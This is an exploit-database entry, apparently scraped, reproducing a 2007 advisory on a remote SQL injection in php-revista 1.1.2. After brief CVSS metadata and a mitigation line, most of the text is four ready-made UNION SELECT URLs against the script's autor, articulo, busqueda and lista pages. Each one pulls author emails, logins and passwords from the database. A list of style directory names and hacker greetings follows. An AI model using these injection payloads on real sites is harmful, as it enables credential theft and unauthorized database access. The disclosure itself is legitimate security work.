header-logo
Suggest Exploit
vendor:
php-revista
by:
Cold z3ro
7.5
CVSS
HIGH
Remote SQL Injection
CWE
Product Name: php-revista
Affected Version From: <= 1.1.2
Affected Version To: <= 1.1.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

php-revista <= 1.1.2 Remote SQL Injection Exploit

The php-revista <= 1.1.2 script is vulnerable to remote SQL injection. An attacker can exploit this vulnerability to execute arbitrary SQL queries and potentially gain unauthorized access to the database.

Mitigation:

Upgrade to a patched version of php-revista or apply necessary security measures to prevent SQL injection attacks.
Source

Exploit-DB raw data:

php-revista <= 1.1.2  Remote SQL Injection Exploit

Found by & contact : Cold z3ro , cold-z3ro@hotmail.com

script :
http://downloads.sourceforge.net/php-revista/revista-1.1.2.tgz?modtime=1025654400&big_mirror=0


Exploits :
==============================================================================
Http://www.Victem.0/revista/estilo/[STYLE]/autor.php?id_autor=-12 union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*
==============================================================================
Http://www.Victem.0/revista/estilo/[STYLE]/articulo.php?id_articulo=-12 union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from
autores where id =1 /*
==============================================================================
Http://www.Victem.0/revista/estilo/[STYLE]/busqueda.php?cadena='+union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*
==============================================================================
Http://www.Victem.0/revista/estilo/[STYLE]/lista.php?email='+union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*
==============================================================================

Styles names :
/discreet/
/galveston/
/mergedidea/
/Widget_Factory/
/Digital_Multiplex/
==========================================================================================================================================
----  GreeTz: |MoHaNdKo|  |Cold One|  |Cold ThreE| |Viper Hacker| |The Wolf KSA| |o0xxdark0o| |OrGanza| |H@mLiT| |Snake12| |Root Shell|
             |Metoovit| |Fucker_net| |Rageb| |CoDeR| |HuGe| |Str0ke| |Dr.TaiGaR| |BLacK HackErD| |JEeN HacKer| |Nazy L!unx| |KURTEFENDY|
             |Spid1r Net| |Big Hacker| |Hacccr| |hacoor| || |Geniral C| |Mr.TyrAnT| |Zax| |Zooz| | Al 3afreat | |The-Falcon-Ksa|
             |The Sniper| | DearMan | |Pro Hackers| | 020 | | abdulla00 " alz3eem" | | The_Viper |Kof2002|
             All i know
==========================================================================================================================================


Big Thx For : www.4azhar.com , Viva My HomeLand Palestine

Print :  Team Hell

# milw0rm.com [2007-03-21]